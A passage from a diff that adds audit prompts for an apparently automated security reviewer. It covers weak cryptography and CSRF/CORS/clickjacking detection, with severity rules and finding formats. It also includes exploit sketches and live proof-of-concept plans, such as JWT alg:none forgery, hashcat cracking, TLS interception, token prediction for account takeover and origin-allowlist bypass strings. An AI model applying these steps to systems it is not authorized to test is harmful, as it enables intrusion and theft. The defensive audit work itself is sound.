+  `crypto.createCipheriv('aes-256-ecb'|'des'|'rc4', ...)`, fixed/zero IV buffer,
+  `Math.random()` for tokens/IDs/secrets, `crypto.randomBytes` good vs
+  `Math.random` bad, `rejectUnauthorized:false` / `NODE_TLS_REJECT_UNAUTHORIZED=
+  '0'`, `https.Agent({rejectUnauthorized:false})`, `jwt.verify(t, key, {
+  algorithms:['none']})` / `jwt.decode` used as verify, `jsonwebtoken` with a
+  weak/hardcoded secret, bcrypt rounds `< 10` / plain `pbkdf2` low iters.
+- **Python:** `hashlib.md5/sha1(pw)`, `Crypto.Cipher.DES`/`ARC4`/`AES.new(key,
+  AES.MODE_ECB)`, static `iv=b'\x00'*16`, `random.random()`/`random.randint`/
+  `random.choice` for tokens (vs `secrets`/`os.urandom`), `ssl._create_unverified_
+  context()` / `verify=False` (requests) / `cert_reqs=ssl.CERT_NONE` /
+  `check_hostname=False`, `jwt.decode(t, verify=False)` / `options={'verify_
+  signature':False}` / `algorithms=['none']`, `hashlib.pbkdf2_hmac` low iters,
+  Django `make_password` overridden to MD5.
+- **Go:** `crypto/md5`/`crypto/sha1`/`crypto/des`/`crypto/rc4` for security,
+  `cipher.NewCBCEncrypter` with a static IV / ECB-style block loop, `math/rand`
+  (incl. `rand.Seed(time.Now())`) for tokens/keys instead of `crypto/rand`,
+  `tls.Config{InsecureSkipVerify:true}`, custom `VerifyConnection` that returns
+  nil, `jwt.ParseWithClaims` accepting `none`/no key check, `x509`
+  `InsecureSkipVerify`.
+- **PHP:** `md5($pw)`/`sha1($pw)`/`crypt()` w/ DES, `mcrypt_*`,
+  `openssl_encrypt($d,'aes-256-ecb',...)` or `'des-ede3'`/`'rc4'`, fixed `$iv`,
+  `rand()`/`mt_rand()`/`uniqid()` for tokens (vs `random_bytes`/
+  `random_int`), `CURLOPT_SSL_VERIFYPEER=>false` / `CURLOPT_SSL_VERIFYHOST=>0`,
+  `'verify'=>false` (Guzzle), `password_hash` good vs raw hash, JWT libs with
+  `'none'`/HS256 confusion.
+- **Java:** `MessageDigest.getInstance("MD5"|"SHA-1")` for passwords,
+  `Cipher.getInstance("DES"|"RC4"|"AES/ECB/PKCS5Padding"|"AES")` (bare "AES" =
+  ECB), `new IvParameterSpec(new byte[16])` static IV, `new Random()` /
+  `Math.random()` for tokens (vs `SecureRandom`), custom `X509TrustManager` with
+  empty `checkServerTrusted`, `setHostnameVerifier((h,s)->true)` /
+  `ALLOW_ALL_HOSTNAME_VERIFIER`, `SSLContext` w/ trust-all, JWT `none`,
+  hardcoded `SecretKeySpec(literal.getBytes(), ...)`.
+- **Rust:** `md5`/`sha1`/`md-5` crates for secrets, `Des`/`Rc4`/ECB block modes,
+  `rand::thread_rng()` for tokens that need a CSPRNG (vs `rand::rngs::OsRng` /
+  `getrandom`), `danger_accept_invalid_certs(true)` / `danger_accept_invalid_
+  hostnames(true)` (reqwest), `rustls` `dangerous()` custom verifier returning
+  Ok, hardcoded key bytes, static `nonce`/`iv` arrays for `aes-gcm`/`chacha20`.
+
+## 3. Detection heuristics
+
+**Taint perspective.** This class is partly *parameter-driven* (the SOURCE is the
+crypto config/key/IV/RNG choice in the code, not always external input) and
+partly *flow-driven* (untrusted ciphertext/token/MITM position reaches a sink
+that fails to verify). Capture both in `source`/`sink`:
+
+- **SOURCE** = the data being protected and *who can reach or supply it*: a
+  password an attacker can offline-crack after a DB leak; a token an attacker
+  receives and must not be able to forge/predict; ciphertext/cookie the attacker
+  holds; a network position where the attacker can MITM the TLS client; the
+  attacker-supplied `alg`/header that a verifier trusts.
+- **SINK** = the weak crypto operation: the hash/cipher/mode/IV/RNG/verify call
+  that is broken or unverified.
+
+Vulnerable patterns to confirm (each needs a reachable SOURCE):
+
+- **Broken hash for passwords (CWE-916/328):** `MD5`/`SHA1`/`SHA-256`/`SHA-512`
+  used *directly* as a password store. Fast hashes (even SHA-256) are wrong for
+  passwords — they must use a memory-hard/iterated KDF (bcrypt/scrypt/argon2/
+  PBKDF2-high-iter). Reachable via any DB compromise → offline cracking. Confirm
+  the hash output is the stored credential and no KDF wraps it.
+- **Broken hash for integrity/signature (CWE-328):** MD5/SHA1 in an HMAC-less
+  "signature", a hand-rolled `hash(secret + msg)` (length-extension), or MD5
+  collision-relevant contexts.
+- **Broken/weak cipher (CWE-327):** DES, 3DES, RC4, Blowfish for new data; RSA
+  with PKCS#1 v1.5 in a padding-oracle-prone spot; export-grade params.
+- **ECB mode (CWE-327):** any `*-ECB` / bare `Cipher.getInstance("AES")`
+  (defaults to ECB) / manual block loop without chaining — identical plaintext
+  blocks leak as identical ciphertext blocks.
+- **Static / reused / predictable IV or nonce (CWE-329/330):** IV hardcoded
+  (`\x00`*16), derived from a constant, or reused across messages with the same
+  key. Catastrophic for CTR/GCM/ChaCha20 (nonce reuse breaks confidentiality and
+  forgeability) and weakens CBC.
+- **Static / missing salt, or fast unsalted hash (CWE-916/759/760):** one global
+  salt, no salt, or salt = username; enables rainbow-table / cross-account
+  cracking.
+- **Weak RNG for security (CWE-330/338):** `Math.random`, `rand`, `mt_rand`,
+  `random.random`, `math/rand`, `java.util.Random`, `time`-seeded RNG, or
+  incrementing/`uniqid`/timestamp used to mint **session tokens, password-reset
+  tokens, API keys, IVs, salts, OTPs, CSRF tokens, password salts, or key
+  material**. Predictable → forgeable/guessable. (RNG for non-security shuffles/
+  jitter is fine.)
+- **Disabled TLS verification (CWE-295):** verification turned off on an outbound
+  client to a security-relevant peer — `verify=False`, `rejectUnauthorized:false`,
+  `InsecureSkipVerify:true`, `VERIFY_NONE`, trust-all `TrustManager`, hostname
+  verifier returning true, `danger_accept_invalid_certs`. Enables MITM →
+  credential/data theft, response forgery.
+- **Hardcoded / committed key, IV, or secret (CWE-321/798):** symmetric key,
+  HMAC/JWT secret, or private key as a string literal, default config value, or
+  committed file — anyone with source/binary can decrypt/forge. (If it's purely a
+  *secret leak* with no crypto-op context, that's the `secrets` finder; here the
+  point is the key feeding a crypto sink that's now defeated.)
+- **JWT alg/verify failures (CWE-327/347):** `alg:none` accepted, signature
+  verification skipped (`decode` used where `verify` is required), HS/RS
+  algorithm confusion (RSA public key used as HMAC secret), unconstrained
+  `algorithms` list, or symmetric secret that is weak/guessable.
+- **Bad key management (CWE-320/322):** key derived from a low-entropy
+  passphrase without a KDF, no separation between signing/encryption keys, key
+  reused as both IV and key, ECDH/RSA without authentication.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these holds on the path:
+
+- **Correct password KDF in place:** `bcrypt`, `scrypt`, `argon2`/`argon2id`, or
+  `PBKDF2` with a sane iteration/cost (bcrypt cost ≥ 10/12, PBKDF2 ≥ ~100k iters,
+  argon2 default params) and a per-user salt. A plain SHA-256 you *thought* was
+  the store but is actually wrapped by `password_hash`/`bcrypt`/Devise/
+  `Argon2`/Django's `PBKDF2PasswordHasher` is safe — trace what's actually
+  persisted.
+- **Strong AEAD with unique nonce:** AES-GCM / ChaCha20-Poly1305 / AES-CBC+HMAC
+  (encrypt-then-MAC) where the IV/nonce is freshly generated per message from a
+  CSPRNG (`randomBytes`/`os.urandom`/`SecureRandom`/`crypto/rand`/`OsRng`). A
+  random per-message IV is correct even if the variable name is `iv` — verify
+  it's regenerated, not constant.
+- **Non-security use of weak primitive:** MD5/SHA1/CRC for cache keys,
+  ETags, content-addressing/dedup, checksums of non-adversarial data, file
+  fingerprints, sharding, bloom filters — **not** a finding (note it only if it
+  guards a trust decision). `Math.random` for UI jitter, A/B bucketing, retry
+  backoff, or non-secret IDs is fine. The bar is: does breaking it grant an
+  attacker anything?
+- **CSPRNG actually used:** the token/IV/salt comes from `crypto.randomBytes`,
+  `secrets.token_*`/`os.urandom`, `SecureRandom`, `crypto/rand`, `OsRng`,
+  `Random::Secure` — even if a weak RNG exists elsewhere in the file for
+  non-security purposes.
+- **TLS verification is on / toggle is unreachable:** `verify=False` etc. gated
+  behind a dev/test-only branch that cannot run in production (env guard you can
+  confirm), or pointed only at a localhost/test fixture, or the disable is in a
+  test file / mock. Confirm the branch is actually unreachable in prod before
+  dropping; if the toggle keys off an attacker- or operator-misconfigurable env
+  var that defaults insecure, it IS a finding.
+- **Key sourced from real secret management:** key/secret read from env, a
+  vault/KMS/HSM, or a runtime-injected config — not a literal. A literal that is
+  obviously a *placeholder/example* in a `.example`/test fixture with no prod
+  wiring is not a live finding (note it; it may be a `secrets` item).
+- **JWT verified correctly:** `verify` with a pinned algorithm allowlist that
+  matches the key type (RS256 with a public key, HS256 with a server secret),
+  `none` rejected, `kid`/issuer/audience checked. The mere presence of `decode`
+  is fine if a `verify` happens first.
+- **Legacy compatibility with a real migration/guard:** a weak verifier kept only
+  to *read* legacy records but rehashing/re-encrypting on next use, with no path
+  that lets an attacker force the weak path. Confirm the upgrade-on-verify exists.
+
+If a guard exists but is bypassable — bcrypt cost too low to matter, PBKDF2 with
+1k iters, AEAD whose nonce is actually a counter that resets, TLS verify gated on
+a header/param an attacker sets, JWT allowlist that still includes a confusable
+alg, "salt" that is constant — it is NOT a mitigation. Flag it and name the
+exact bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — break yields direct, unauth, high-impact compromise: predictable
+  password-reset/session tokens from a weak RNG (account takeover); `alg:none`/
+  skipped JWT verification or HS/RS confusion (auth bypass / forge any token);
+  disabled TLS verification on a path carrying credentials or auth tokens to a
+  MITM-reachable peer; hardcoded key/secret that decrypts production data or
+  forges signatures for all users; nonce reuse on AES-GCM exposing plaintext or
+  enabling forgery of authenticated messages.
+- **High** — realistically-conditioned high impact: fast/unsalted password hash
+  (MD5/SHA1/raw-SHA256) — full offline cracking after any DB leak; ECB/DES/RC4 or
+  static IV protecting PII/secrets at rest that an attacker can obtain; weak RNG
+  for API keys behind authn; disabled TLS verify on an internal-but-sensitive
+  client.
+- **Medium** — constrained: weak crypto over data with limited sensitivity or
+  high attacker cost; static salt with an otherwise-strong KDF; weak RNG for a
+  token with short TTL + rate limiting; padding-oracle-prone construction needing
+  specific conditions; partial mitigation that raises but doesn't close the bar.
+- **Low/Info** — weak primitive in a non-security context, or theoretical with no
+  reachable SOURCE — usually downgrade or drop per §4. A committed example key
+  with no prod wiring → Info/`secrets`.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "crypto-001",
+  "title": "Unsalted SHA1 used as the password store — offline-crackable on DB leak",
+  "vuln_class": "crypto",
+  "owasp": "A04:2025",
+  "cwe": "CWE-916",
+  "asvs": "V11",
+  "severity": "high",
+  "status": "likely",
+  "confidence": "high",
+  "file": "app/models/user.py",
+  "line": 41,
+  "end_line": 43,
+  "code_excerpt": "self.password_hash = hashlib.sha1(password.encode()).hexdigest()",
+  "source": "user passwords for all accounts; attacker reaches them via any DB read/dump (SQLi, backup, insider) and cracks offline",
+  "sink": "hashlib.sha1(...).hexdigest() persisted as the credential — a single-pass fast hash, no salt, no key-stretching",
+  "data_flow": "password -> sha1() (one pass, no salt) -> users.password_hash column; verification recomputes the same sha1. No KDF/salt/cost between the password and the stored value.",
+  "sanitizers_checked": "no bcrypt/scrypt/argon2/PBKDF2 wrapper anywhere on set or verify; no per-user salt column; not Django make_password (raw hashlib); SHA1 is ~GH/s on commodity GPUs so cost factor is effectively zero",
+  "rationale": "Reachable for the entire user table the moment the DB leaks. Same pattern at admin.py:88 (admin reset). Single root cause: the hashing helper.",
+  "exploit_sketch": "Obtain users.password_hash (e.g. via the SQLi at report.py:71). hashcat -m 100 against the unsalted SHA1 list cracks weak/common passwords in minutes, recovering plaintext for credential reuse.",
+  "dynamic_poc_plan": "Register a user with a known password via the live signup endpoint; read the stored hash from the DB/test harness; show hashlib.sha1(known_pw) == stored value (proves no salt/KDF), then crack a second weak password with hashcat to demonstrate recovery.",
+  "proposed_fix": "Move password storage onto a memory-hard, salted KDF instead of a single-pass unsalted hash, so a DB leak no longer enables practical offline cracking. (High-level direction, not a patch — the implementing engineer chooses the KDF, parameters, and legacy-migration approach.)"
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. State explicitly *what is protected and who reaches it*
+(`source`), the *exact weak operation* with the real API name (`sink`), how the
+data reaches that operation and why the primitive/parameter is broken
+(`data_flow`), and which §4 mitigation is absent or, if present, the exact bypass
+(`sanitizers_checked`). A weak primitive with **no reachable thing it protects**
+is not a finding. Pick `cwe` by failure mode: 327 broken/weak algo or mode,
+328 weak hash, 916 unsalted/fast password hash, 326 inadequate strength,
+330/331/338 weak RNG/entropy, 329 static IV/nonce, 295/347 cert/signature
+verification. Use `status:"likely"` for a proven static trace, `"confirmed"`
+only after dynamic repro, `"triage"` if the protected SOURCE or reachability is
+uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the chosen primitive/parameter is actually broken and exploitable on
+the running system. Pick the oracle matching the failure mode:
+
+1. **Weak password hash.** Register/seed a user with a known password via the
+   live endpoint; extract the stored hash (DB, debug route, or test harness).
+   **Observed proof** = `weak_hash(known_pw [+salt])` reproduces the stored value
+   bit-for-bit (no KDF/salt), and a second weak password cracks under `hashcat`/
+   `john` with the matching mode — recovering plaintext.
+2. **Predictable token (weak RNG).** Trigger many token mints (signup, password
+   reset, API-key create) and capture the values. **Observed proof** = tokens are
+   sequential/correlated, or — given the seed source (PID/time) — you predict the
+   next token and use it to claim another user's reset/session, completing an
+   account takeover against the live app.
+3. **ECB / static IV / nonce reuse.** Submit two plaintexts with identical
+   blocks (or the same plaintext twice) through the encrypt endpoint and capture
+   ciphertext. **Observed proof** = identical plaintext blocks yield identical
+   ciphertext blocks (ECB), or two messages share the IV/nonce (CTR/GCM reuse) —
+   then recover XOR of plaintexts / forge a GCM tag to demonstrate decryption or
+   forgery.
+4. **Disabled TLS verification.** Point the client at a host you control with a
+   self-signed/mismatched cert (DNS override, `/etc/hosts`, or a proxy like
+   mitmproxy). **Observed proof** = the client completes the request against the
+   bad cert (no error), and you capture/alter the plaintext payload (e.g. the
+   credentials/token it sent) — proving MITM.
+5. **JWT alg/verify failure.** Take a valid token, set header `alg:none` and
+   strip the signature, or sign with the public key as an HMAC secret (HS/RS
+   confusion), or forge with the hardcoded/guessed secret. **Observed proof** =
+   the live app accepts the forged token (returns the victim's data / an
+   authenticated session) — impossible if verification were correct.
+6. **Hardcoded key.** Use the literal key from source to decrypt a captured
+   ciphertext/cookie or forge a valid signed token, then replay it. **Observed
+   proof** = the app accepts the forged/decrypted artifact as authentic.
+
+Record the exact payload/command and observed evidence in the `Repro` object
+(`reproduced`, `method:"live-exploit"`, `poc`, `observed`, `impact`). A
+reproduced forgery/decryption/MITM or a bit-for-bit weak-hash match proves the
+class — set `method:"live-exploit"`. If the app can't be run, fall back to a
+focused unit test that drives the crypto helper and asserts the broken property
+(ECB block equality, static IV, hash without salt, `verify` accepting a forged
+token) — `method:"unit-test"`.
diff --git a/plugins/security/prompts/finders/csrf-cors.md b/plugins/security/prompts/finders/csrf-cors.md
new file mode 100644
index 0000000..ace849f
--- /dev/null
+++ b/plugins/security/prompts/finders/csrf-cors.md
@@ -0,0 +1,346 @@
+<!--
+FINDER PROMPT — csrf-cors. You are a fresh-context auditor hunting ONE class:
+CSRF, CORS & Clickjacking. Read the target's code & config; emit finding objects.
+Signal discipline (AGENTS.md) is binding: only a REACHABLE cross-origin attack
+path — a state-changing request a foreign site can forge, a credentialed CORS
+response a foreign origin can read, or a sensitive view a foreign page can frame
+— with no effective guard on the path is a finding. No generic header-hardening
+checklists, no defense-in-depth musings without a concrete sink, no dead code,
+no posture/process items.
+-->
+
+# Finder — CSRF, CORS & Clickjacking (csrf-cors)
+
+**Class key:** `csrf-cors` · **OWASP:** A01:2025 · **CWE:** CWE-352, CWE-1021, CWE-942 · **ASVS:** V3
+
+## 1. Objective
+
+Find state-changing endpoints that a foreign web origin can drive on a
+logged-in victim's behalf — via a forged cross-site request (no anti-CSRF
+token / no SameSite cookie), a permissive CORS policy that lets an attacker
+origin read credentialed responses, or a missing framing defense that allows
+clickjacking of a sensitive action.
+
+## 2. Where to look
+
+The attack target is the **ambient-credential boundary**: any endpoint
+authenticated by a cookie/session, HTTP Basic, or a client TLS cert that the
+browser attaches automatically on cross-site requests. Bearer tokens read from
+JS-controlled storage (`Authorization: Bearer`) are NOT auto-attached, so they
+are generally CSRF-immune — confirm the auth mechanism before flagging.
+
+Entry points / surfaces:
+
+- **State-changing routes:** `POST`/`PUT`/`PATCH`/`DELETE` handlers, but also
+  `GET` handlers that mutate (logout, "delete via link", `/transfer?to=...`,
+  toggle/enable/disable, admin actions). GET-that-mutates is forgeable with a
+  bare `<img>`/`<link>`.
+- **Global CSRF config:** the framework's CSRF middleware enable/disable site,
+  and per-route/per-controller `skip`/`exempt` annotations. The bug is usually
+  the *exemption*, not the absence.
+- **Cookie/session setup:** where the session cookie is issued — its
+  `SameSite`, `Secure`, `HttpOnly` attributes drive cross-site
+  exploitability.
+- **CORS config:** middleware/handlers that set `Access-Control-Allow-Origin`
+  (ACAO), `-Allow-Credentials` (ACAC), `-Allow-Methods`, `-Allow-Headers`,
+  `-Expose-Headers`; reflected-origin logic; preflight (`OPTIONS`) handlers.
+- **Framing/headers:** where `X-Frame-Options` / CSP `frame-ancestors` are
+  set (or globally not set) for sensitive pages (login, OAuth consent, fund
+  transfer, account settings, admin).
+- **Cross-origin message channels:** browser `window.postMessage` handlers
+  (`message` event listeners) that act on data without checking
+  `event.origin` — a CSRF-adjacent cross-origin sink.
+
+Route/handler & config signals to grep:
+
+- **Crystal:** Lucky `protect_from_forgery`, Amber `CSRF` pipe / `csrf_token`,
+  Kemal — *no built-in CSRF*, so cookie-auth Kemal apps are bare unless they
+  roll their own; `Access-Control-Allow-Origin` header writes via
+  `context.response.headers`.
+- **Ruby/Rails:** `protect_from_forgery`, `skip_before_action
+  :verify_authenticity_token`, `skip_forgery_protection`,
+  `protect_from_forgery with: :null_session`, `config.action_controller
+  .forgery_protection_origin_check`, `Rack::Cors` `allow do origins ...`,
+  Sinatra `Rack::Protection` (and `Rack::Protection` *disabled*).
+- **Node/TS:** `csurf`/`csrf-csrf`/`@fastify/csrf-protection` (presence &
+  exemptions); `cors` package `origin: true`/`origin: '*'` with
+  `credentials: true`; manual `res.setHeader('Access-Control-Allow-Origin',
+  req.headers.origin)`; `helmet` framing config; Express session cookie
+  `sameSite`.
+- **Python:** Django `@csrf_exempt`, `CsrfViewMiddleware` removed from
+  `MIDDLEWARE`, `CSRF_TRUSTED_ORIGINS`, `CORS_ALLOW_ALL_ORIGINS`/
+  `CORS_ORIGIN_ALLOW_ALL`, `CORS_ALLOWED_ORIGIN_REGEXES`,
+  `CORS_ALLOW_CREDENTIALS`, `django-cors-headers`; Flask `flask-wtf`
+  `CSRFProtect` (presence) / `WTF_CSRF_ENABLED=False` / `@csrf.exempt`,
+  `flask-cors` `CORS(app, ...)`; `SESSION_COOKIE_SAMESITE`,
+  `X_FRAME_OPTIONS`/`SecurityMiddleware`, FastAPI `CORSMiddleware
+  allow_origins=["*"], allow_credentials=True`.
+- **Go:** `rs/cors` `AllowedOrigins: []string{"*"}` + `AllowCredentials: true`
+  or `AllowOriginFunc: func(o string){ return true }`; gin
+  `cors.Config{AllowAllOrigins:true}`; manual
+  `w.Header().Set("Access-Control-Allow-Origin", r.Header.Get("Origin"))`;
+  most Go routers have *no* CSRF by default — look for `gorilla/csrf`,
+  `nosurf`; `http.SetCookie` SameSite field.
+- **PHP:** Laravel `VerifyCsrfToken` `$except` array / `csrf_field()`;
+  Symfony `csrf_protection: false` / `is_csrf_token_valid`; raw apps with no
+  token at all; `header("Access-Control-Allow-Origin: " . $_SERVER
+  ['HTTP_ORIGIN'])`, `header("Access-Control-Allow-Credentials: true")`.
+- **Java:** Spring Security `.csrf().disable()` /
+  `csrf(AbstractHttpConfigurer::disable)` / `.ignoringRequestMatchers(...)`;
+  `CorsConfiguration.setAllowedOrigins(List.of("*"))` /
+  `addAllowedOriginPattern("*")` + `setAllowCredentials(true)`;
+  `@CrossOrigin(origins="*", allowCredentials="true")`;
+  `setAllowedOriginPatterns` with `*`; framing via
+  `headers().frameOptions().disable()`.
+- **Rust:** `actix-cors` `Cors::permissive()` / `allow_any_origin()` +
+  `supports_credentials()`; `tower-http` `CorsLayer::permissive()` /
+  `AllowOrigin::any()` / `AllowOrigin::mirror_request()` +
+  `allow_credentials(true)`; most Rust frameworks have *no* CSRF
+  middleware — cookie-auth handlers are bare unless a token scheme is rolled.
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted / attacker-controlled): the *cross-site request*
+itself (forced by attacker HTML/JS from another origin while the victim is
+logged in) and, for CORS, the attacker-chosen `Origin` request header
+reflected into a response header. For postMessage, the cross-origin message
+`event.data`. The "input" here is the request's *provenance*, not a parameter
+value — the question is whether a foreign origin can issue/read it.
+
+**Taint SINKS** (dangerous op):
+- **CSRF:** a state-changing handler (DB write, money/permission/account
+  mutation, OS/admin action) reachable with **ambient credentials** and **no
+  unguessable token tied to the session** required.
+- **CORS:** writing `Access-Control-Allow-Origin` to a value derived from /
+  equal to the request `Origin`, **together with** `Access-Control-Allow-
+  Credentials: true` — letting the attacker origin's JS read the credentialed
+  response body.
+- **Clickjacking:** rendering a sensitive, state-changing UI with **no**
+  `X-Frame-Options: DENY/SAMEORIGIN` and **no** CSP `frame-ancestors`.
+- **postMessage:** acting on `event.data` (navigation, token relay, state
+  change) without validating `event.origin` against an allowlist.
+
+Vulnerable patterns to confirm:
+
+- **CSRF protection disabled / exempted on a mutating, cookie-auth route:**
+  - Rails: `skip_before_action :verify_authenticity_token` (or
+    `protect_from_forgery with: :null_session`) on a controller that writes.
+  - Django: `@csrf_exempt` on a `POST` view that mutates; or
+    `CsrfViewMiddleware` absent from `MIDDLEWARE`.
+  - Flask: app uses session cookies but no `CSRFProtect`/`flask-wtf`, or
+    `@csrf.exempt` / `WTF_CSRF_ENABLED=False`.
+  - Spring: `http.csrf(csrf -> csrf.disable())` while `formLogin`/session
+    cookies are in use.
+  - Laravel: route/path listed in `VerifyCsrfToken::$except`.
+  - Go/Rust/Kemal: cookie-session app with **no token scheme present at all**
+    on mutating handlers.
+- **GET that mutates:** `get "/account/delete"`, `app.get('/logout', ...)` that
+  ends a session or writes — forgeable with a plain `<img src>` regardless of
+  token middleware (which typically only guards unsafe methods).
+- **Reflected-origin CORS with credentials:** ACAO set to the request Origin
+  (or `*` paired — illegally but some stacks coerce — with credentials) and
+  ACAC `true`:
+  - Node: `res.setHeader('Access-Control-Allow-Origin', req.headers.origin);
+    res.setHeader('Access-Control-Allow-Credentials','true')`.
+  - Express `cors`: `cors({ origin: true, credentials: true })` (reflects any
+    origin).
+  - Go: `w.Header().Set("Access-Control-Allow-Origin", r.Header.Get("Origin"))`
+    + `...Allow-Credentials","true"`.
+  - PHP: `header("Access-Control-Allow-Origin: {$_SERVER['HTTP_ORIGIN']}");
+    header("Access-Control-Allow-Credentials: true");`.
+  - Spring: `@CrossOrigin(origins = "*", allowCredentials = "true")` or
+    `config.setAllowedOriginPatterns(List.of("*"))` +
+    `setAllowCredentials(true)`.
+  - FastAPI/Starlette: `allow_origins=["*"], allow_credentials=True`
+    (Starlette silently mirrors the origin in this combo).
+  - Rust: `Cors::permissive().supports_credentials()` /
+    `CorsLayer::permissive()` then `.allow_credentials(true)`.
+- **Sloppy origin allowlist (bypassable):** origin check by substring/prefix/
+  suffix or unanchored regex:
+  - `origin.endsWith("trusted.com")` → `trusted.com.evil.com` or
+    `nottrusted.com`.
+  - `origin.startsWith("https://trusted.com")` →
+    `https://trusted.com.evil.com`.
+  - `origin.includes("trusted.com")` → `https://evil.com?trusted.com`.
+  - regex `/trusted\.com/` (no anchors / unescaped `.`) → matches
+    `trustedxcom.evil.com`, `eviltrusted.com`.
+  - reflecting `null` origin (`Allow-Origin: null`) — reachable from sandboxed
+    iframes / `data:` documents the attacker controls.
+- **Missing framing defense on sensitive pages:** no `X-Frame-Options` and no
+  `frame-ancestors` on login / OAuth-consent / transfer / settings / admin
+  pages, where a framed UI + a transparent overlay tricks the victim into
+  clicking a real button (clickjacking). Pair with a state-changing action to
+  be a finding, not a bare missing header.
+- **postMessage without origin check:**
+  `window.addEventListener('message', e => { /* uses e.data, no e.origin
+  check */ })` — a foreign frame can drive the handler.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective on the path:
+
+- **No ambient credentials on the route.** If the endpoint authenticates only
+  via a `Authorization: Bearer`/JWT/API-key header read from JS (not a cookie,
+  not Basic, not client cert), a cross-site page cannot attach it → no CSRF.
+  Likewise an endpoint that requires no auth and exposes no per-user state is
+  not a CSRF target. Confirm the actual auth mechanism in code.
+- **Effective anti-CSRF token** present and verified on every unsafe method:
+  framework default (Rails `protect_from_forgery` active, Django
+  `CsrfViewMiddleware` enabled + `{% csrf_token %}`, Spring `csrf()` default,
+  Laravel `VerifyCsrfToken` not exempting the route, flask-wtf `CSRFProtect`
+  active) — a synchronizer/double-submit token bound to the session and
+  unguessable. A double-submit cookie counts only if the token cookie is
+  `__Host-`/`SameSite` and the server compares header-vs-cookie.
+- **`SameSite=Lax` or `Strict` session cookie** (and the route is *not* a
+  top-level GET navigation for `Lax`). Lax is the modern browser default and
+  blocks cross-site POST cookie attachment; with Lax, the remaining CSRF
+  surface is top-level `GET` navigations only — so a Lax cookie largely
+  neutralizes cross-site POST CSRF. Note: state-changing GETs are still
+  exploitable under Lax via top-level navigation; Strict blocks those too.
+- **Origin/Referer validation done correctly** on unsafe methods: parse the
+  `Origin` (or `Referer`) header and **exact-match** against a closed allowlist
+  of full origins (scheme+host+port) — Rails `forgery_protection_origin_check`,
+  a hand-rolled `Origin == "https://app.example.com"` check. Anchored,
+  fully-escaped regex matching a closed set also counts.
+- **CORS that is safe by construction:**
+  - ACAO is a **static, closed allowlist** of exact origins (not the reflected
+    request origin, not `*`), each compared by equality; OR
+  - ACAO is `*` **with credentials NOT enabled** (`Access-Control-Allow-
+    Credentials` absent/false) — browsers refuse to send cookies, and `*`
+    cannot be combined with credentials, so no credentialed read; the response
+    is treated as public anyway. Only a finding if the data behind it is meant
+    to be private and is in fact served (then it is an access-control issue,
+    flag under that class); OR
+  - the response carries **no credentials and no sensitive data** (truly public
+    API). CORS only governs *reading* the response — it never bypasses CSRF
+    protections for *writing*, so a permissive CORS policy on a token-protected,
+    non-credentialed endpoint is not exploitable here.
+- **Framing defense present:** `X-Frame-Options: DENY`/`SAMEORIGIN` **or** CSP
+  `frame-ancestors 'none'`/`'self'`/closed allowlist covering the sensitive
+  page. Either one suffices; do not flag a missing `X-Frame-Options` if
+  `frame-ancestors` is set (and vice-versa). Non-sensitive, non-state-changing
+  pages (marketing, docs) being frameable is not a finding.
+- **postMessage handler validates `event.origin`** against an allowlist before
+  acting (and ideally checks `event.source`).
+- **Method genuinely safe & side-effect-free:** a `GET`/`HEAD` that only reads
+  is not a CSRF sink (reading via forged request yields nothing the attacker
+  can see cross-origin unless CORS leaks it — which is the CORS finding, not
+  CSRF).
+
+If a guard exists but is bypassable (token not actually verified, exemption on
+a mutating route, substring/unanchored-regex origin check, reflected origin with
+credentials, `SameSite=None` without a token, `X-Frame-Options` set but
+duplicated/invalid value browsers ignore, `frame-ancestors` with a wildcard) it
+is NOT a mitigation — flag it and name the exact bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — forgeable/cross-origin-readable path to a full account or
+  privilege takeover with realistic preconditions: CSRF on
+  change-password/change-email/add-admin/disable-2FA/create-API-key with no
+  token and no SameSite, OR reflected-origin-with-credentials CORS exposing
+  session/admin data or a CSRF-token-bearing response (which then unlocks
+  further CSRF). Unauthenticated-to-admin or one-click account takeover.
+- **High** — CSRF on a significant but not total-takeover action (fund
+  transfer, data deletion, permission change, settings mutation) on a
+  cookie-auth route with a bypassable/absent token; or credentialed CORS with a
+  bypassable origin allowlist (substring/regex) exposing per-user data; or
+  clickjacking of a single-click sensitive state change (delete account,
+  authorize OAuth, transfer).
+- **Medium** — CSRF/CORS where exploitation needs unusual conditions or yields
+  limited impact: SameSite=Lax present so only a state-changing top-level GET
+  is forgeable; CORS leaks non-critical per-user data; clickjacking requiring
+  multi-step drag/social engineering; `null`-origin-only CORS reflection.
+- **Low/Info** — missing framing header on a sensitive-but-not-mutating page,
+  `*` CORS without credentials on a non-sensitive endpoint, or a
+  defense-in-depth gap with no demonstrable cross-origin action. Usually an
+  Info-appendix note, not a body finding.
+
+Note in `rationale` whether the action is one-click vs. multi-step and whether
+auth is required, since that drives the severity.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites / shared config;
+list extras in `rationale`). Fields:
+
+```json
+{
+  "id": "csrf-cors-001",
+  "title": "Reflected-origin CORS with credentials exposes authenticated /api/account to any origin",
+  "vuln_class": "csrf-cors",
+  "owasp": "A01:2025",
+  "cwe": "CWE-942",
+  "asvs": "V3",
+  "severity": "critical",
+  "status": "likely",
+  "confidence": "high",
+  "file": "src/middleware/cors.ts",
+  "line": 11,
+  "end_line": 14,
+  "code_excerpt": "res.setHeader('Access-Control-Allow-Origin', req.headers.origin);\nres.setHeader('Access-Control-Allow-Credentials', 'true');",
+  "source": "attacker-chosen Origin request header (req.headers.origin) reflected verbatim; victim has a session cookie auto-attached cross-site",
+  "sink": "Access-Control-Allow-Origin set to the request Origin + Access-Control-Allow-Credentials:true — lets attacker-origin JS read the credentialed response",
+  "data_flow": "req.headers.origin -> res ACAO header (no allowlist/equality check) ; ACAC=true ; applied globally including /api/account which returns the session user's PII and CSRF token",
